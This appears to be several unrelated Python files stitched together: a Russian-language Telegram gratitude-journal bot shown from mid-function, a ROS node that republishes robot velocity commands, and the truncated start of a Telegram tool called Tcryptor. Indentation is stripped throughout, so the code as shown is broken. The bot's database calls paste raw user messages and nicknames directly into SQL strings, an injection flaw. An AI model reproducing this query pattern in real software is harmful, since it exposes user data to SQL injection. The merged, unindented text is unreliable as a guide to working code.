if message.text == "Хочу!":
bot.send_message(message.chat.id,
bfunc.gender_text(message.chat.id, bdat.text_write_grate_male, bdat.text_write_grate_female),
reply_markup=bdat.empty)
bot.register_next_step_handler(message, add_second_grate)
elif message.text == "Пока нет":
bot.send_message(message.chat.id, bfunc.gender_text(message.chat.id, bdat.good_male, bdat.good_female))
bot.send_message(message.chat.id,
'Кнопка, чтобы добавить новую благодарность, всегда будет в главном меню. Можешь пользоваться ей в любое время дня и ночи =)',
reply_markup=bdat.what_time)
bot.send_message(message.chat.id,
'И последнее! В практике благодарности очень важна регулярность.\n\nДля того, чтобы записать благодарность и стать немного счастливее, нужна всего 1 минута в день. Но важно делать это каждый день.')
bot.register_next_step_handler(message, time_science)
else:
bot.send_message(message.chat.id, 'Мы не понимаем ваш ответ. Советуем использовать кнопки.')
bot.register_next_step_handler(message, offer_again)
def add_second_grate(message):
text = message.text
try:
bfunc.ex_command("INSERT INTO notes (date, note, chat_id) VALUES (CURRENT_TIMESTAMP,'" + text + "', '" + str(
message.chat.id) + "');")
bot.send_message(message.chat.id, bfunc.gender_text(message.chat.id, bdat.good_male, bdat.good_female))
bot.send_message(message.chat.id,
'Кнопка, чтобы добавить новую благодарность, всегда будет в главном меню. Можешь пользоваться ей в любое время дня и ночи =)',
reply_markup=bdat.what_time)
bot.send_message(message.chat.id,
'И последнее! В практике благодарности очень важна регулярность.\n\nДля того, чтобы записать благодарность и стать немного счастливее, нужна всего 1 минута в день. Но важно делать это каждый день.')
bot.register_next_step_handler(message, time_science)
except Exception as ex:
bot.send_message(message.chat.id, "Непредвиденная ошибка, попробуйте добавить благодарность снова.")
bot.register_next_step_handler(message, add_second_grate)
print(type(ex))
def time_science(message):
bot.send_message(message.chat.id,
'Одни ученые считают, что ее очень полезно делать утром, чтобы сразу настроиться на позитивное восприятие происходящего.\n\nДругие советуют записывать благодарности перед сном — чтобы ощутить ценность уходящего дня.\n\nТут все на твой вкус :) ',
reply_markup=bdat.i_understood)
bot.register_next_step_handler(message, yes_important)
def yes_important(message):
bot.send_message(message.chat.id, 'Да, регулярность тут очень важна.')
bot.send_message(message.chat.id, 'Во сколько тебе напомнить о практике благодарности? (по часовому поясу MSK)',
reply_markup=bdat.many_moments_onboarding)
bot.register_next_step_handler(message, set_time)
def set_time(message):
if message.text in bdat.list_moments:
bot.send_message(message.chat.id, 'Отлично, напомню тебе завтра в ' + message.text + '! До встречи :)')
bfunc.ex_command(
"update bot_users set scheduler = '" + message.text + "' where chat_id = '" + str(message.chat.id) + "';")
bot.send_message(message.chat.id, 'Ты в главном меню', reply_markup=bdat.main_menu_buttons)
else:
bot.send_message(message.chat.id, 'Мы не понимаем ваш ответ. Советуем использовать кнопки.')
bot.register_next_step_handler(message, set_time)
@bot.message_handler(content_types=['text'])
def main_menu(message):
update_user_data(message)
if message.text == 'Новая благодарность' or message.text == 'Хочу записать ещё благодарность':
bot.send_message(message.chat.id,
bfunc.gender_text(message.chat.id, bdat.text_write_grate_male, bdat.text_write_grate_female),
reply_markup=bdat.back)
bot.register_next_step_handler(message, new_grate)
elif message.text == stick.insp:
bot.send_message(message.chat.id, 'Добро пожаловать во Вдохновение — мой любимый раздел.\n\nЗдесь можно вдохновиться благодарностями других пользователей бота и поделиться своими. Все анонимно, нежно и заботливо :3 Все сообщения проходят модерацию. Почитать про историю создания этого раздела можно в [блоге](https://t.me/pioblog/75) разработчика бота.\n\nТы хочешь получить вдохновение или поделиться своим для других?', disable_web_page_preview=True, reply_markup=bdat.insp_1_buttons, parse_mode="Markdown")
bot.register_next_step_handler(message, select_insp)
elif message.text == 'Настройки':
bot.send_message(message.chat.id, 'Что будем настраивать?', reply_markup=bdat.settings_buttons)
bot.register_next_step_handler(message, settings)
elif message.text == 'База знаний':
#bot.send_message(message.chat.id, bdat.knowledge_base, reply_markup=bdat.main_menu_buttons)
bot.send_photo(message.chat.id,
'AgACAgIAAxkBAAEK2eFiP4Wac9FsoAZ5UjZAqRVfeArJEgAC6cAxGyPK-EmUAytTrCDcbQEAAwIAA3MAAyME'
,
caption=bdat.knowledge_base)
elif message.text == 'Мои благодарности':
bot.send_message(message.chat.id,
'Всего благодарностей: ' + bfunc.count_all(message.chat.id) + '\n\n' + bfunc.last_grates(7, 0,
message.chat.id),
reply_markup=bdat.last_grates_buttons)
bot.register_next_step_handler(message, view_grates, 1)
elif message.text == 'Команда бота':
bot.send_message(message.chat.id, bdat.bot_team_text, reply_markup=bdat.to_main_munu_button,
parse_mode="Markdown", disable_web_page_preview=True)
bot.register_next_step_handler(message, bot_team)
elif message.text == 'О практике благодарности':
bot.send_message(message.chat.id,
'Сейчас я расскажу тебе о практике благодарности.',
reply_markup=bdat.cont_back)
bot.register_next_step_handler(message, about_1)
elif message.text == 'Получить поддержку':
bot.send_message(message.chat.id,
'Если ты плохо себя чувствуешь, это нормально. Иногда все мы чувствуем себя не очень. Важно разрешать этому состоянию быть.',
reply_markup=bdat.support_1)
bot.register_next_step_handler(message, support)
elif message.text == 'В главное меню':
bot.send_message(message.chat.id,
'Ты в главном меню',
reply_markup=bdat.main_menu_buttons)
else:
#bot.send_message(message.chat.id,'Мы не поняли вашу команду, попробуйте использовать кнопки или начать из главного меню (/start). Если что-то сломалось — пишите @piofant.',reply_markup=bdat.main_menu_buttons)
bot.send_message(message.chat.id,'Записать отправленный текст как новую благодарность?',reply_markup=bdat.check_that_new_grate_buttons)
bot.register_next_step_handler(message, check_that_new_grate, text=message.text, old_message=message)
def check_that_new_grate(message, text, old_message):
if message.text == 'Да':
new_grate(old_message)
else:
bot.send_message(message.chat.id,'Ты в главном меню',reply_markup=bdat.main_menu_buttons)
def select_insp(message):
if message.text == 'Получить':
bot.send_message(message.chat.id, 'Хорошо!\n\nЧто тебе сейчас больше хочется — послушать или почитать благодарности?', reply_markup=bdat.insp_get_buttons)
bot.register_next_step_handler(message, insp_get)
elif message.text == 'Поделиться':
bot.send_message(message.chat.id, 'Вдохновение - это опыт развития практики или уникальная благодарность и рассказанная вокруг неё история, которая задаст облако контекста вокруг благодарности.\n\nКак тебе хочется поделиться — текстом или голосом?', reply_markup=bdat.insp_share_buttons)
bot.register_next_step_handler(message, insp_share)
elif message.text == 'В главное меню':
bot.send_message(message.chat.id, 'Ты в главном меню', reply_markup=bdat.main_menu_buttons)
else:
bot.send_message(message.chat.id, 'Мы не понимаем ваш ответ. Советуем использовать кнопки.')
bot.register_next_step_handler(message, select_insp)
def insp_get(message):
if message.text == 'Послушать':
voices = bfunc.data_command("SELECT file_id FROM voices WHERE `trigger` = 1")
voice_number = len(voices)-1
bot.send_voice(message.chat.id, voices[random.randint(0, len(voices)-1)][0], reply_markup=bdat.after_voice_insp)
bot.register_next_step_handler(message, after_voice_insp, voice_number)
elif message.text == 'Почитать':
texts = bfunc.data_command("SELECT text FROM texts WHERE `trigger` = 1")
text_number = len(texts)-1
bot.send_message(message.chat.id, texts[random.randint(0, len(texts)-1)][0], reply_markup=bdat.after_text_insp)
bot.register_next_step_handler(message, after_text_insp, text_number)
elif message.text == 'Назад':
bot.send_message(message.chat.id, 'Ты хочешь получить вдохновение или поделиться им?', reply_markup=bdat.insp_1_buttons)
bot.register_next_step_handler(message, select_insp)
else:
bot.send_message(message.chat.id, 'Мы не понимаем ваш ответ. Советуем использовать кнопки.')
bot.register_next_step_handler(message, insp_get)
def after_voice_insp(message, voice_number):
if message.text == 'Ещё':
voices = bfunc.data_command("SELECT file_id FROM voices WHERE `trigger` = 1")
if voice_number == -1:
voice_number = len(voices)-1
bot.send_voice(message.chat.id, voices[voice_number][0], reply_markup=bdat.after_voice_insp)
voice_number -= 1
bot.register_next_step_handler(message, after_voice_insp, voice_number)
elif message.text == 'Назад':
bot.send_message(message.chat.id, 'Что тебе сейчас больше хочется — послушать или почитать благодарности?', reply_markup=bdat.insp_get_buttons)
bot.register_next_step_handler(message, insp_get)
elif message.text == 'В главное меню':
bot.send_message(message.chat.id, 'Ты в главном меню', reply_markup=bdat.main_menu_buttons)
else:
bot.send_message(message.chat.id, 'Мы не понимаем ваш ответ. Советуем использовать кнопки.')
bot.register_next_step_handler(message, after_voice_insp)
def after_text_insp(message, text_number):
if message.text == 'Ещё':
texts = bfunc.data_command("SELECT text FROM texts WHERE `trigger` = 1")
if text_number == -1:
text_number = len(texts)-1
bot.send_message(message.chat.id, texts[text_number][0], reply_markup=bdat.after_text_insp)
text_number -= 1
#bot.send_message(message.chat.id, texts[random.randint(0, len(texts)-1)][0], reply_markup=bdat.after_text_insp)
bot.register_next_step_handler(message, after_text_insp, text_number)
elif message.text == 'Назад':
bot.send_message(message.chat.id, 'Что тебе сейчас больше хочется — послушать или почитать благодарности?', reply_markup=bdat.insp_get_buttons)
bot.register_next_step_handler(message, insp_get)
elif message.text == 'В главное меню':
bot.send_message(message.chat.id, 'Ты в главном меню', reply_markup=bdat.main_menu_buttons)
else:
bot.send_message(message.chat.id, 'Мы не понимаем ваш ответ. Советуем использовать кнопки.')
bot.register_next_step_handler(message, after_voice_insp)
def insp_share(message):
if message.text == 'Голосом':
bot.send_message(message.chat.id, 'Отправь следующим сообщением голосовое сообщение с опытом развития практики или с твоей уникальной благодарностью и важными словами, которое услышат другие пользователи бота, когда захотят получить вдохновение. Благодарность можешь подкрепить мини-историей, которая создаст облако контекста вокруг неё.\n\nВсе анонимно, поэтому можешь говорить максимально искренне :)', reply_markup=bdat.main_menu_buttons)
elif message.text == 'Текстом':
bot.send_message(message.chat.id, 'Напиши тут опыт развития практики, твою уникальную благодарность и вдохновляющее сообщение, которое я буду показывать другим пользователям бота, когда они захотят получить вдохновение.\n\nВсе анонимно, поэтому можешь писать максимально искренне и открыто =)', reply_markup=bdat.back)
bot.register_next_step_handler(message, insp_share_text)
elif message.text == 'Назад':
bot.send_message(message.chat.id, 'Ты хочешь получить вдохновение или поделиться им?',
reply_markup=bdat.insp_1_buttons)
bot.register_next_step_handler(message, select_insp)
else:
bot.send_message(message.chat.id, 'Мы не понимаем ваш ответ. Советуем использовать кнопки.')
bot.register_next_step_handler(message, insp_share)
def insp_share_text(message):
text = message.text
if message.text == 'Назад':
bot.send_message(message.chat.id, 'Как тебе хочется поделиться — текстом или голосом?',
reply_markup=bdat.insp_share_buttons)
bot.register_next_step_handler(message, insp_share)
else:
bot.send_message(message.chat.id,
'Спасибо, мы приняли ваше сообщение, оно будет рассмотрено модератором.', reply_markup=bdat.main_menu_buttons)
markup = InlineKeyboardMarkup()
markup.row_width = 2
markup.add(InlineKeyboardButton("Принять текст", callback_data="cb_insp_text_yes", one_time_keyboard=True),
InlineKeyboardButton("Отклонить текст (удалить)", callback_data="cb_insp_text_no", one_time_keyboard=True))
bot.send_message(bdat.authors_id[0], text, reply_markup=markup)
def support(message):
bot.send_message(message.chat.id,
bfunc.gender_text(message.chat.id, bdat.support_male, bdat.support_female) + bfunc.rand_grate(
message.chat.id, 5, 30), reply_markup=bdat.support_2)
bot.register_next_step_handler(message, support_2)
def support_2(message):
if message.text == 'Мне нужна помощь':
bot.send_message(message.chat.id, bdat.help_contacts, reply_markup=bdat.thanks_button)
bot.register_next_step_handler(message, thanks_)
elif message.text == 'Спасибо, мне лучше':
bot.send_message(message.chat.id,
'Пожалуйста! Ты правда большой молодец, что столько делаешь для себя.\n\nЧтобы признать, что тебе плохо, нужна большая смелость. Не забудь записать благодарность об этом :)',
reply_markup=bdat.main_menu_buttons)
def thanks_(message):
bot.send_message(message.chat.id, "Ты в главном меню", reply_markup=bdat.main_menu_buttons)
def about_1(message):
if message.text == 'Далее':
bot.send_message(message.chat.id,
'Практика благодарности — работающий способ улучшить свое состояние и качество жизни.\n\nОна заключается в том, чтобы каждый день обращать на хорошие вещи, которые с тобой происходят, и ощущать за них благодарность.\n\nТак ты будешь развивать привычку замечать хорошее, больше ценить себя и свои действия. А значит и чувствовать себя лучше, ведь твоя субъективная реальность зависит от того, на что ты ' + bfunc.gender_text(
message.chat.id, 'привык', 'привыкла') + ' направлять внимание.',
reply_markup=bdat.about2_text)
bot.register_next_step_handler(message, about_2)
else:
bot.send_message(message.chat.id, 'Ты в главном меню', reply_markup=bdat.main_menu_buttons)
def about_2(message):
bot.send_message(message.chat.id,
'Практику благодарности рекомендуют не только психологи, но и ученые.\n\nСогласно исследованиям, практика благодарности повышает самооценку, позитивно влияет на физическое и ментальное здоровье, понижает агрессию, делает людей более эмпатичными, открытыми и устойчивыми.',
reply_markup=bdat.about3_text)
bot.register_next_step_handler(message, about_3)
def about_3(message):
bot.send_message(message.chat.id,
'Самый популярный способ — это дневник. Кстати, дневник благодарностей активно используют в научно доказанной когнитивно-поведенческой терапии.\n\nЯ сам несколько раз начинал вести его, потому что чувствовал себя плохо, а практика благодарности помогала мне приходить в хорошее состояние. Но я столкнулся с тем, что забываю делать новые записи в дневнике и пересматривать старые — а это очень важно делать регулярно.',
reply_markup=bdat.about4_text)
bot.register_next_step_handler(message, about_4)
def about_4(message):
bot.send_message(message.chat.id,
'Я поговорил с людьми вокруг меня, которые делали практику благодарности. Многие сталкивались с этими проблемами и даже перестали делать практику, хотя раньше она им помогала.\n\nТогда я придумал этого бота, чтобы максимально упростить для людей процесс регулярной записи новых благодарностей и пересмотра старых.',
reply_markup=bdat.cont)
bot.register_next_step_handler(message, about_5)
def about_5(message):
# bot.send_message(message.chat.id, stick.about_6_text, reply_markup=bdat.main_menu_buttons)
bot.send_message(message.chat.id, stick.about_6_text, reply_markup=bdat.about5_text)
bot.register_next_step_handler(message, about_6)
def about_6(message):
# bot.send_message(message.chat.id, stick.about_6_text, reply_markup=bdat.main_menu_buttons)
bot.send_message(message.chat.id, stick.about_7_text, reply_markup=bdat.main_menu_buttons, parse_mode="Markdown",
disable_web_page_preview=True)
def bot_team(message):
if message.text == "В главное меню":
bot.send_message(message.chat.id, 'Ты в главном меню', reply_markup=bdat.main_menu_buttons)
else:
bot.send_message(message.chat.id, 'Ты в главном меню', reply_markup=bdat.main_menu_buttons)
def view_grates(message, x):
if message.text == "В главное меню":
bot.send_message(message.chat.id, 'Ты в главном меню', reply_markup=bdat.main_menu_buttons)
elif message.text == "Показать все":
all_grates = bfunc.last_grates(1, "all", message.chat.id)
bot.send_message(message.chat.id,
"[Вот все твои благодарности](" + bfunc.to_telegraph_link(all_grates, message.chat.id) + ")",
reply_markup=bdat.last_grates_buttons, parse_mode="Markdown")
bot.register_next_step_handler(message, view_grates, x)
elif message.text == "Неделю назад":
bot.send_message(message.chat.id, bfunc.last_grates(7 + x * 7, 7 * x, message.chat.id),
reply_markup=bdat.last_grates_buttons)
bot.register_next_step_handler(message, view_grates, x + 1)
def new_grate(message):
if message.text == '/start' or message.text == "В главное меню" or message.text == "Назад" or message.text == "Хочу записать ещё благодарность" or message.text == "/set_notification" or message.text == "Новая благодарность" or message.text == "Мои благодарности":
bot.send_message(message.chat.id, 'Ты в главном меню', reply_markup=bdat.main_menu_buttons)
else:
text = message.text
try:
bfunc.ex_command(
"INSERT INTO notes (date, note, chat_id) VALUES (CURRENT_TIMESTAMP,'" + text + "', '" + str(
message.chat.id) + "');")
except Exception as ex:
bot.send_message(message.chat.id, "Непредвиденная ошибка, попробуйте добавить благодарность снова.")
bot.register_next_step_handler(message, new_grate)
print(type(ex))
bot.send_message(message.chat.id, bfunc.gender_text(message.chat.id, random.choice(stick.dofamin_male),
random.choice(stick.dofamin_female)),
reply_markup=bdat.again_or_not)
check_achievement(message.chat.id)
bot.register_next_step_handler(message, again_or_not_func)
def again_or_not_func(message):
if message.text == 'Хочу записать еще благодарность':
bot.send_message(message.chat.id,
bfunc.gender_text(message.chat.id, bdat.text_write_grate_male, bdat.text_write_grate_female),
reply_markup=bdat.back)
bot.register_next_step_handler(message, new_grate)
elif message.text == 'Пока хватит':
bot.send_message(message.chat.id,
'Спасибо тебе, что делаешь важные для себя шаги. Ты просто супер!\n\nВозвращайся с новыми благодарностями :)',
reply_markup=bdat.main_menu_buttons)
else:
new_grate(message)
def settings(message):
if message.text == 'Имя':
bot.send_message(message.chat.id, 'Давай поменяем имя! Как тебя зовут?')
bot.register_next_step_handler(message, set_new_name)
elif message.text == 'Достижения':
bot.send_message(message.chat.id, 'Как ты хочешь получать сообщения о достижениях - голосовым или текстовым сообщением?', reply_markup=bdat.achieve_methods)
bot.register_next_step_handler(message, set_achieve_method)
elif message.text == 'Обращение':
bot.send_message(message.chat.id,
'Как ты хочешь, чтобы мы говорили о твоих благодарностях?\n«Я благодарен за то, что...»\n«Я благодарна за то, что...» ',
reply_markup=bdat.gender)
bot.register_next_step_handler(message, set_new_gender)
elif message.text == 'Напоминалки':
bot.send_message(message.chat.id, 'Во сколько тебе напомнить о практике благодарности? (по часовому поясу MSK)',
reply_markup=bdat.many_moments)
bot.register_next_step_handler(message, set_new_time)
elif message.text == 'Благодарности':
bot.send_message(message.chat.id, 'Настройки благодарностей',
reply_markup=bdat.grate_settings_buttons)
bot.register_next_step_handler(message, grate_settings)
elif message.text == 'В главное меню':
bot.send_message(message.chat.id, 'Ты в главном меню', reply_markup=bdat.main_menu_buttons)
else:
bot.send_message(message.chat.id, 'Мы не понимаем ваш ответ. Советуем использовать кнопки.')
bot.register_next_step_handler(message, settings)
def grate_settings(message):
if message.text == 'Удалить все благодарности':
bot.send_message(message.chat.id,
'Вы точно хотите удалить все свои благодарности? Их будет невозможно восстановить.',
reply_markup=bdat.grate_settings_buttons_confirm)
bot.register_next_step_handler(message, grate_settings_confirm)
elif message.text == 'Назад':
bot.send_message(message.chat.id, 'Что будем настраивать?', reply_markup=bdat.settings_buttons)
bot.register_next_step_handler(message, settings)
else:
bot.send_message(message.chat.id, 'Мы не понимаем ваш ответ. Советуем использовать кнопки.')
bot.register_next_step_handler(message, grate_settings)
def grate_settings_confirm(message):
if message.text == 'Подтвердить':
bfunc.delete_all(message.chat.id)
bot.send_message(message.chat.id, 'Все твои благодарности удалены. Что будем настраивать?',
reply_markup=bdat.settings_buttons)
bot.register_next_step_handler(message, settings)
elif message.text == 'Назад':
bot.send_message(message.chat.id, 'Настройки благодарностей', reply_markup=bdat.grate_settings_buttons)
bot.register_next_step_handler(message, grate_settings)
elif message.text == 'В главное меню':
bot.send_message(message.chat.id, 'Ты в главном меню', reply_markup=bdat.main_menu_buttons)
else:
bot.send_message(message.chat.id, 'Мы не понимаем ваш ответ. Советуем использовать кнопки.')
bot.register_next_step_handler(message, grate_settings_confirm)
def set_new_time(message):
if message.text in bdat.list_moments:
bfunc.ex_command(
"update bot_users set scheduler = '" + message.text + "' where chat_id = '" + str(message.chat.id) + "';")
bot.send_message(message.chat.id,
'Супер! Буду напоминать тебе каждый день в ' + message.text + ' :)\nКстати, не хочешь записать благодарность?',
reply_markup=bdat.after_setting)
bot.register_next_step_handler(message, after_setting_choice)
elif message.text == 'Отключить напоминания':
bot.send_message(message.chat.id, bdat.notif_off_text_from_settings, reply_markup=bdat.after_setting)
bfunc.ex_command(
"update bot_users set scheduler = '" + 'off' + "' where chat_id = '" + str(message.chat.id) + "';")
bot.register_next_step_handler(message, after_setting_choice)
elif message.text == "Назад":
bot.send_message(message.chat.id, 'Что будем настраивать?', reply_markup=bdat.settings_buttons)
bot.register_next_step_handler(message, settings)
else:
bot.send_message(message.chat.id, 'Мы не понимаем ваш ответ. Советуем использовать кнопки.')
bot.register_next_step_handler(message, set_new_time)
def set_new_time_from_notif(message):
if message.text in bdat.list_moments:
bfunc.ex_command(
"update bot_users set scheduler = '" + message.text + "' where chat_id = '" + str(message.chat.id) + "';")
bot.send_message(message.chat.id,
'Хорошо! Буду напоминать тебе каждый день в ' + message.text + ' :)\n\nТы в главном меню',
reply_markup=bdat.main_menu_buttons)
elif message.text == 'Отключить напоминания':
bot.send_message(message.chat.id, bdat.notif_off_text, reply_markup=bdat.main_menu_buttons)
bfunc.ex_command(
"update bot_users set scheduler = '" + 'off' + "' where chat_id = '" + str(message.chat.id) + "';")
elif message.text == "В главное меню":
bot.send_message(message.chat.id, 'Ты в главном меню', reply_markup=bdat.main_menu_buttons)
bot.register_next_step_handler(message, settings)
else:
bot.send_message(message.chat.id, 'Мы не понимаем ваш ответ. Советуем использовать кнопки.')
bot.register_next_step_handler(message, set_new_time_from_notif)
def set_new_name(message):
name = message.text
bfunc.ex_command("update bot_users set nickname = '" + name + "' where chat_id = '" + str(message.chat.id) + "';")
bot.send_message(message.chat.id,
"Отлично, " + name + ". Я все запомнил :)\nКстати, не хочешь записать благодарность?",
reply_markup=bdat.after_setting)
bot.register_next_step_handler(message, after_setting_choice)
def set_achieve_method(message):
if message.text == 'Голосовое сообщение':
bfunc.ex_command("update bot_users set achieve_method = '" + "voice" + "' where chat_id = '" + str(message.chat.id) + "';")
elif message.text == 'Текстовое сообщение':
bfunc.ex_command("update bot_users set achieve_method = '" + "text" + "' where chat_id = '" + str(message.chat.id) + "';")
elif message.text == 'Круглое видеосообщение':
bfunc.ex_command("update bot_users set achieve_method = '" + "video_note" + "' where chat_id = '" + str(message.chat.id) + "';")
else:
bot.send_message(message.chat.id, 'Мы не понимаем ваш ответ. Советуем использовать кнопки.')
bot.register_next_step_handler(message, set_achieve_method)
bot.send_message(message.chat.id,
"Хорошо.\nКстати, не хочешь записать благодарность?",
reply_markup=bdat.after_setting)
bot.register_next_step_handler(message, after_setting_choice)
def set_new_gender(message):
if message.text == 'Я благодарен':
bfunc.ex_command("update bot_users set gender = 'male' where chat_id = '" + str(message.chat.id) + "';")
bot.send_message(message.chat.id,
"Договорились! Теперь буду предлагать тебе продолжить фразу «Я благодарен за то, что»\n\nКстати, не хочешь записать благодарность?",
reply_markup=bdat.after_setting)
bot.register_next_step_handler(message, after_setting_choice)
elif message.text == 'Я благодарна':
bfunc.ex_command("update bot_users set gender = 'female' where chat_id = '" + str(message.chat.id) + "';")
bot.send_message(message.chat.id,
"Договорились! Теперь буду предлагать тебе продолжить фразу «Я благодарна за то, что»\n\nКстати, не хочешь записать благодарность?",
reply_markup=bdat.after_setting)
bot.register_next_step_handler(message, after_setting_choice)
else:
bot.send_message(message.chat.id, 'Мы не понимаем ваш ответ. Советуем использовать кнопки.')
bot.register_next_step_handler(message, set_new_gender)
def after_setting_choice(message):
if message.text == 'Другие настройки':
bot.send_message(message.chat.id, 'Что будем настраивать?', reply_markup=bdat.settings_buttons)
bot.register_next_step_handler(message, settings)
elif message.text == 'В главное меню':
bot.send_message(message.chat.id, 'Ты в главном меню', reply_markup=bdat.main_menu_buttons)
elif message.text == 'Записать благодарность':
bot.send_message(message.chat.id,
bfunc.gender_text(message.chat.id, bdat.text_write_grate_male, bdat.text_write_grate_female),
reply_markup=bdat.empty)
bot.register_next_step_handler(message, new_grate)
else:
bot.send_message(message.chat.id, 'Мы не понимаем ваш ответ. Советуем использовать кнопки.')
bot.register_next_step_handler(message, after_setting_choice)
def after_notif(message):
if message.text == 'Новая благодарность':
bot.send_message(message.chat.id,
bfunc.gender_text(message.chat.id, bdat.text_write_grate_male, bdat.text_write_grate_female),
reply_markup=bdat.back)
bot.register_next_step_handler(message, new_grate)
elif message.text == 'Отключить напоминания':
bot.send_message(message.chat.id, bdat.notif_off_text, reply_markup=bdat.main_menu_buttons)
bfunc.ex_command(
"update bot_users set scheduler = '" + 'off' + "' where chat_id = '" + str(message.chat.id) + "';")
elif message.text == 'Выбрать другое время напоминания':
bot.send_message(message.chat.id, 'Во сколько тебе напомнить о практике благодарности? (по часовому поясу MSK)',
reply_markup=bdat.many_moments)
bot.register_next_step_handler(message, set_new_time_from_notif)
elif message.text == 'Главное меню':
bot.send_message(message.chat.id, 'Ты в главном меню', reply_markup=bdat.main_menu_buttons)
elif message.text == 'Команда бота':
bot.send_message(message.chat.id, bdat.bot_team_text, reply_markup=bdat.to_main_munu_button,
parse_mode="Markdown", disable_web_page_preview=True)
bot.register_next_step_handler(message, bot_team)
else:
bot.send_message(message.chat.id, 'Мы не понимаем ваш ответ. Советуем использовать кнопки.')
bot.register_next_step_handler(message, after_notif)
def function_to_run():
try:
times = bfunc.double_list()
current_datetime = datetime.now()
current_hour = current_datetime.hour
print(current_datetime, current_hour, sep='\n\n')
for i in range(len(times)):
if times[i][1] == str(current_hour) + ":00":
try:
msg = bot.send_message(times[i][0], stick.notifi + bfunc.last_grates(5, "last", times[i][0][:500]) + "\nВсего благодарностей: " + bfunc.count_all(times[i][0])+ '\n\nОтключить напоминания или изменить время: /set_notification', reply_markup=bdat.main_menu_buttons)
bot.clear_step_handler_by_chat_id(times[i][0])
#bot.register_next_step_handler(msg, after_notif)
except Exception as ex:
if 'bot was blocked by the user' in str(ex):
bfunc.delete_user(times[i][0])
update_number_of_users()
else:
print('Возникла осечка в отправке напоминалки человеку ' + str(times[i][0]) + '.\nПричина: ')
print(ex, type(ex), "Содержимое переменной str(ex): ", str(ex), sep='\n')
except Exception as ex:
print('Возникла осечка в работе напоминалки.\nПричина: ')
print(ex, type(ex), sep='\n')
def schedule_checker():
while True:
schedule.run_pending()
sleep(30)
def choose_achivement_method(chat_id):
markup = InlineKeyboardMarkup()
markup.row_width = 2
markup.add(InlineKeyboardButton("Видео-кружочком", callback_data="cb_video_note", one_time_keyboard=True), InlineKeyboardButton("Голосом", callback_data="cb_voice", one_time_keyboard=True),
InlineKeyboardButton("Текстом", callback_data="cb_text", one_time_keyboard=True))
bot.send_message(chat_id, 'Я буду сообщать тебе о твоих достижениях, как ты хочешь получать сообщения - круглыми видеосообщениями, голосовыми или текстовыми сообщениями? В первый раз я отправил видео-кружочком. В настройках можно будет изменить способ получения достижений.', reply_markup=markup)
def check_achievement(chat_id):
number = str(bfunc.count_all(chat_id))
triggers = set([str(x[0]) for x in bfunc.data_command("SELECT `trigger` FROM video_notes")])
if number == "5":
choose_achivement_method(chat_id)
bot.send_voice(chat_id, bfunc.data_command("SELECT file_id FROM voices WHERE `trigger` = " + str(number))[0][0])
elif number in triggers and int(number) > 2:
method = bfunc.data_command("SELECT achieve_method FROM bot_users WHERE chat_id = " + str(chat_id))[0][0]
if method == 'video_note':
bot.send_video_note(chat_id,
bfunc.data_command("SELECT file_id FROM video_notes WHERE `trigger` = " + str(number))[0][0])
elif method == 'voice':
bot.send_voice(chat_id,
bfunc.data_command("SELECT file_id FROM voices WHERE `trigger` = " + str(number))[0][0])
elif method == 'text':
bot.send_message(chat_id, bfunc.data_command("SELECT text FROM texts WHERE `trigger` = " + str(number))[0][0])
if __name__ == '__main__':
try:
schedule.every().hour.at(':01').do(function_to_run)
Thread(target=schedule_checker).start()
bot.infinity_polling()
bot.enable_save_next_step_handlers(delay=2)
bot.load_next_step_handlers()
except Exception as ex:
print('Возникла осечка в работе программы.\nПричина: ')
print(ex, type(ex), sep='\n') |
republish_cmd_vel.py | #!/usr/bin/env python
import rospy
from geometry_msgs.msg import Twist
from math import pi
from kobuki_msgs.msg import BumperEvent, Led
from threading import Thread
from std_srvs.srv import Empty, EmptyResponse
class CmdVelRepublisher():
"A class to republish cmd_vel information"
def __init__(self):
rospy.init_node('cmd_vel_republisher')
self.disabled = False
self.stop_thread = None
self.led_thread = None
self.x_lim = rospy.get_param("~x_lim", 0.55)
self.z_lim = rospy.get_param("~z_lim", pi)
self.pub = rospy.Publisher('/mobile_base/commands/velocity', Twist, queue_size=10)
self.pub_led1 = rospy.Publisher('/mobile_base/commands/led1', Led, queue_size=10)
self.pub_led2 = rospy.Publisher('/mobile_base/commands/led2', Led, queue_size=10)
rospy.Service("/reset_bumper_stop", Empty, self.enable)
rospy.Subscriber('/mobile_base/events/bumper', BumperEvent, self.bumper_cb)
rospy.Subscriber("/cmd_vel", Twist, self.callback)
rospy.logdebug(rospy.get_name() + " setting up")
def callback(self,msg):
if not self.is_disabled():
out = Twist()
rospy.logdebug(rospy.get_name() + ": I heard %s" % msg)
out.linear.x = msg.linear.x if msg.linear.x <= self.x_lim else self.x_lim
out.angular.z = msg.angular.z if msg.angular.z <= self.z_lim else self.z_lim
self.pub.publish(out)
else:
rospy.logwarn("cmd vel republisher disabled")
def stop(self):
while self.is_disabled() and not rospy.is_shutdown():
out = Twist()
out.linear.x = 0.
out.angular.z = 0.
self.pub.publish(out)
rospy.sleep(0.1)
def leds(self):
while self.is_disabled() and not rospy.is_shutdown():
self.pub_led1.publish(Led(value=2))
self.pub_led2.publish(Led(value=3))
rospy.sleep(0.5)
self.pub_led1.publish(Led(value=3))
self.pub_led2.publish(Led(value=2))
rospy.sleep(0.5)
self.pub_led1.publish(Led(value=0))
self.pub_led2.publish(Led(value=0))
def bumper_cb(self, msg):
if not self.is_disabled() and msg.state:
self.disabled = msg.state
self.stop_thread = Thread(target=self.stop)
self.stop_thread.start()
self.led_thread = Thread(target=self.leds)
self.led_thread.start()
def enable(self, req):
self.disabled = False
if self.stop_thread:
self.stop_thread.join()
if self.led_thread:
self.led_thread.join()
return EmptyResponse()
def is_disabled(self):
return self.disabled
if __name__ == '__main__':
republisher = CmdVelRepublisher()
rospy.spin()
|
Tcryptor.py | print(f' _ _ ---==== Tcryptor ====--- _ _\n')
from TcCore import *
from TcProcessor import TcProcessor
from TcEncryptor import TcEncryptor
from telegram import ParseMode
from telegram.utils.helpers import mention_html
import sys, traceback
from threading import Thread
import urllib.request # Check for internet connectivity
os.system(f'title _ _ ---==== Tcryptor {ver} ====--- _ _')
while True:
try:
ACR_PING_CODE = urllib.request.urlopen("https://api.telegram.org").getcode()
if ACR_PING_CODE == 200:
logger.info('Telegram pinged successfully!')
break
else:
logger.warning('Telegram ping error code: '+str(ACR_PING_CODE)+', retrying in 20 seconds')
time.sleep(20)
except:
logger.warning('Unable to ping Telegram, retrying in 10 seconds')
time.sleep(10)
# this is a general error handler function. If you need more information about specific type of update, add it to the
# payload in the respective if clause
def error(update, context):
# we want to notify the user of this problem. This will always work, but not notify users if the update is an
